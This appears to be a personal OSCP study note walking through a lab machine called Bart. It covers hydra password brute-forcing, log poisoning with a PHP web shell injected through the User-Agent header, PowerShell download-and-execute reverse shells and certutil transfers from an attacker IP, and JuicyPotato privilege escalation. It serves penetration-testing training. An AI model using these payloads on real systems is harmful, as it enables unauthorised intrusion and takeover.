O
O
OSCP Notes
Search
K

Bart (Windows) - juicy potato priv esc, more hydra practice

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
gobuster won't work since 200 code messes up.
this is messing it up.
had to use python3 dirsearch.py -u http://bart.htb -e php,aspx,asp,txt -x 500,404,403 instead
I had internet issue yesterday and couldn't get the /monitor/ link forever. I guess it's sometimes good to take a break.
login form found.
Observing traffic on burp
tried to log in as harvey with the password, potter (had to look up this one)
since csrf is set in the request, hydra didn't work well.
Added monitor.bart.htb to the etc/hosts file.
added internal-01.bart.htb to the hosts file as well.
Another login form found.
this time,no csrf!
"csrf=e1e86e54783cc512631bb30c318ddd749e99ad3f79254fa9da7891c957dd58bf&user_name=^USER^&user_password=^PASS^&action=login:incorrect"
uname=harvey+&passwd=potter&submit=Login
Invalid
hydra -l harvey -P ~/rockyou.txt internal-01.bart.htb http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid" -t 54
This didn't work...
hydra -l harvey -P ~/rockyou.txt 127.0.0.1 http-post-form "/simple_chat/login_form.php:C=uname=^USER^&passwd=^PASS^&submit=Login:F=Password"
set up the burp to redirect the traffic:
tried it didn't work.
Another route:
cp /usr/share/metasploit-framework/data/wordlists/common_roots.txt .
it accepts password longer than 8 letters so,
cat common_roots.txt| awk '{if (length($0) > 7) print}' > passv2.txt
hydra -l harvey -P passv2.txt 127.0.0.1 http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Password"
omg I was typing the URL wrong the entire time!!
It looks like it's logging everytime someone visits the log.php
if we change the useragent to malicious code, we can execute?
<?php system($ REQUEST['cmd']); ?>
successfully executed
By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything)
  • changed useragent to the php code
  • changed file name to cmd.php in GET
now we can do reverse shell!
Let's use powershell
grab a ps1 from nishang and host it on python http server.
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.14:80/shell.ps1')
Now we have our user shell.
executing whoami /priv shows that impersonateprivilege is enabled>
juicy potato!
transfer over the file:
certutil -urlcache -split -f http://10.10.16.14:80/JuicyPotato.exe C:\Users\Public\JuicyPotato.exe
now I copied the ps1 shell file and adjusted the port to 4444 and started another net cat listner
Now, I created a bat file that contains the following code:
powershell "IEX (New-Object Net.Webclient).downloadstring('http://10.10.16.14:80/shell.ps1')"
Then, I transferred the file over to the target machine and named it reverse.bat
certutil -urlcache -split -f http://10.10.16.14:80/shellsama.bat C:\Users\Public\reverse.bat
Finally, I ran the following command (the -l 1111 is not doing anything here)
.\JuicyPotato.exe -t * -p .\reverse.bat -l 1111 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
for CSLID value, I just used one of the may here https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/